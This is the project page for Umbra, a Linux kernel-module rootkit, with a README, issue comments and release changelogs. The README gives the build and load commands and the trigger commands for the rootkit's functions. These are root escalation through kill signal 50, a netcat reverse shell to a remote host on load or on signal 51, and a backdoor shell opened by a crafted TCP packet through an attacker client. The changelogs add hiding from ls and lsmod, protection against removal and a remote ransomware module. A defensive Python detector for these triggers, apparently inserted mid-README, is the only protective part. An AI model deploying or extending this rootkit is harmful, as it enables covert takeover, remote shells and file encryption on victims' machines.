An LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can be used to spawn a reverse shell to a remote host and more.

Overview


Umbra

Umbra (/ˈʌmbrə/) is an experimental LKM rootkit for kernels 4.x and 5.x (up to 5.7) which opens a network backdoor that spawns reverse shells to remote hosts and more.

The rootkit is still under development, although the features listed below are already fully operational.

Backdoor in action

Note: This rootkit has been developed and tested using kernel 5.4.0 and Ubuntu 18.04.

Features

  • NEW: Backdoor which spawns reverse shell to remote IP after receiving a malicious TCP packet.
  • Privilege escalation by sending signal 50.
  • Spawn netcat reverse shell on module load.
  • Spawn netcat reverse shell to a remote host by sending signal 51.

More functionalities will come in later updates.

Disclaimer

This rootkit is purely for educational purposes. I am not responsible for any damage resulting from its unintended use.

Also bear in mind that Umbra does not incorporate any rootkit hiding or protection mechanisms yet.

IMPORTANT: If you are going to test this rootkit on your own machine, I strongly recommend using a VM.

Build and install

Remember that you should have a 4.x or 5.x kernel available.

  1. Download your kernel header files
apt install linux-headers-$(uname -r)

  2. Configure your include path to cover the kernel header directory (usually under /usr/src). If you are using vscode, you can check .vscode/c_cpp_properties.json for an example of which directories to include.

  3. Clone the project
git clone https://github.com/h3xduck/Umbra.git
cd Umbra

  4. Build Umbra
make

  5. Load Umbra in the kernel
sudo insmod ./umbra.ko

Unloading Umbra

sudo rmmod umbra

Usage

Change current user privileges to root

  • Send signal 50 to any PID.
kill -50 1

Start reverse netcat shell to IP:PORT

  • Set your desired IP and port in CONFIG.H before building the rootkit. By default 127.0.0.1:5888

  • Start listening at the remote host.

nc -lvp 5888
  • Send signal 51 to any PID. Umbra will catch it and start the shell.
kill -51 1

Note: Umbra also tries to start the reverse shell on load.

NEW: Spawn reverse shell via backdoor

Any host can get a reverse shell by sending a specially-crafted packet to a machine infected with Umbra. The backdoor will try to open the shell on IP:5888, where IP is the IP address of the attacking machine.

You can look at the code to see how the packet is built, but I also provide a client which does the job for you. You can download the client from the latest release, or build your own using my library RawTCP.

The client is run as follows:

./client <attacker_ip> <victim_ip>

Here <attacker_ip> is the address the backdoor will connect the reverse shell back to, and <victim_ip> is the address of the machine infected with Umbra.
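A defender-side check for the two triggers this README describes (kill signals 50/51 and the default reverse-shell port 5888), added here as an example and not part of the Umbra project: it parses constructed auditd SYSCALL records and a constructed /proc/net/tcp excerpt and reports what matches. It assumes an x86_64 host (where kill() is syscall 62) and the default port from CONFIG.H; the sample lines are constructed, not real captures.

```python
import re
# Trigger values from the README: kill signals 50/51, default reverse-shell port 5888 (CONFIG.H).
TRIGGER_SIGNALS = {50, 51}
REVERSE_SHELL_PORT = 5888
KILL_SYSCALL_X86_64 = 62  # assumption: x86_64 host, where kill() is syscall 62
# Constructed auditd SYSCALL records (not real captures). auditd prints the
# syscall arguments a0..a3 in hex, so signal 50 shows up as a1=32.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1620000000.001:101): arch=c000003e syscall=62 success=yes exit=0 a0=1 a1=32 a2=0 a3=0 pid=4242 uid=1000 comm="kill" exe="/usr/bin/kill"
type=SYSCALL msg=audit(1620000000.002:102): arch=c000003e syscall=62 success=yes exit=0 a0=1337 a1=f a2=0 a3=0 pid=4243 uid=1000 comm="kill" exe="/usr/bin/kill"
type=SYSCALL msg=audit(1620000000.003:103): arch=c000003e syscall=62 success=yes exit=0 a0=1 a1=33 a2=0 a3=0 pid=4244 uid=1000 comm="bash" exe="/usr/bin/bash"
"""
# Constructed /proc/net/tcp excerpt: addresses are hex "IP:port", IPv4 bytes
# stored little-endian; state 01 is TCP_ESTABLISHED.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0A01A8C0:B6E2 1401A8C0:1700 01 00000000:00000000 00:00000000 00000000  1000        0 12345 1 0000000000000000 20 4 30 10 -1
   1: 0A01A8C0:0016 1E01A8C0:C350 01 00000000:00000000 00:00000000 00000000     0        0 12346 1 0000000000000000 20 4 30 10 -1
"""
AUDIT_FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def suspicious_kill_events(audit_text):
    """Return (pid, uid, signal) for kill() calls that carry an Umbra trigger signal."""
    hits = []
    for line in audit_text.splitlines():
        f = dict(AUDIT_FIELD.findall(line))
        if f.get("type") != "SYSCALL" or int(f.get("syscall", -1)) != KILL_SYSCALL_X86_64:
            continue
        sig = int(f["a1"], 16)  # second kill() argument is the signal number
        if sig in TRIGGER_SIGNALS:
            hits.append((int(f["pid"]), int(f["uid"]), sig))
    return hits

def hex_to_ip_port(field):  # e.g. "0100007F:1700" -> ("127.0.0.1", 5888)
    ip_hex, port_hex = field.split(":")
    octets = [str(int(ip_hex[i:i + 2], 16)) for i in (6, 4, 2, 0)]  # reverse byte order
    return ".".join(octets), int(port_hex, 16)

def reverse_shell_peers(proc_net_tcp_text, port=REVERSE_SHELL_PORT):
    """Return (local_ip, remote_ip) for established sockets whose remote port is `port`."""
    peers = []
    for line in proc_net_tcp_text.splitlines()[1:]:  # skip the header row
        cols = line.split()
        if len(cols) < 4 or cols[3] != "01":
            continue
        local_ip, _ = hex_to_ip_port(cols[1])
        remote_ip, remote_port = hex_to_ip_port(cols[2])
        if remote_port == port:
            peers.append((local_ip, remote_ip))
    return peers
```

On a live host the same functions can be fed `ausearch -sc kill --raw` output and the contents of /proc/net/tcp; note that the v0.3.0 hiding features only affect what lsmod and ls show, not these socket and audit records.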

References

The development of this rootkit involved a substantial amount of research about LKMs and rootkit techniques. The following is an incomplete list of the resources I used:

  • How to create LKMs
  • Linux syscall reference
  • Some rootkit references

License

This project is licensed under the GPLv2 license. See LICENSE.

Comments
  • Umbra Modules update

    Change-log

    This update incorporates the so called Umbra Modules:

    • Umbra modules: malware-like extensions for Umbra which can be triggered via the Umbra Injector.
    • New Umbra Module "Ransom", a trivial ransomware program using a simple (very bad) encryption algorithm.
    • Ransom can be used to encrypt or decrypt a whole directory (recursively, including sub directories) remotely.
    • The rootkit backdoor now listens for the new injector requests accordingly.
    • Minor fixes.
    opened by h3xduck 0
  • Stealth update

    Completed new version of Umbra, including:

    • New stable version of Umbra Injector
      • No need to start a listener anymore, managed by the client.
    • New stealth mechanisms:
      • Directories of Umbra are hidden from the user
      • Attacker can hide/unhide Umbra locally and remotely
    enhancement 
    opened by h3xduck 0
Releases(v0.4.0)
  • v0.4.0(Sep 18, 2021)

    Change-log

    Incorporated the so called Umbra Modules:

    • Umbra modules: malware-like extensions for Umbra which can be triggered via the Umbra Injector.
    • The rootkit backdoor now listens for the new injector requests accordingly.

    Ransom: A ransomware-like module

    • New Umbra Module "Ransom", a trivial ransomware program using a simple (very bad) encryption algorithm.
    • Ransom can be used to encrypt or decrypt a whole directory (recursively, including sub directories) remotely.
    • Encrypted files appear as .ubr files.

    Other changes

    • Added a script for installing Umbra and configuring the environment.
    • New explanatory gifs on the README and updated other parts.
    • Minor fixes.
  • v0.3.0(Jun 10, 2021)

    Changelog:

    Added stealth capabilities for Umbra

    • New hooks so that the user no longer can see any file/directory of Umbra via ls or similar commands.
    • New signals to trigger Umbra's visibility by lsmod commands and similar. Umbra no longer can be removed by rmmod in invisible mode.
    • Improvements in the backdoor: New payloads are recognized for new functionalities of the Umbra Injector.

    Major update of the Umbra Injector

    • Possible to get a reverse shell remotely just with the client, no longer need of starting a separate netcat listener.
    • New modes: Hiding/unhiding the rootkit remotely.
    • New getopt system, with help manual.
  • v0.2.0(May 9, 2021)

    Changelog:

    Incorporated network backdoor which will spawn a reverse shell to a remote host when receiving a malicious TCP packet.

    • Added netfilter hooks.
    • Module for processing network packets.

    Added a client to trigger the backdoor remotely.

    • Using my library RawTCP.

    Other changes.

    • Updated README and added examples.
    • Fixed some bugs
  • v0.1.0(Apr 25, 2021)

    Changelog:

    • Added ftrace hooks for kill
    • Privilege escalation for kill signals
    • Netcat reverse shell added
    • Start reverse shell with kill signal
    • Created functional LKM.
    • In general, just added all base code for the project.
Owner
Marcos S. Bajo
CSE Student at UC3M. Free software advocate and cybersecurity enthusiast.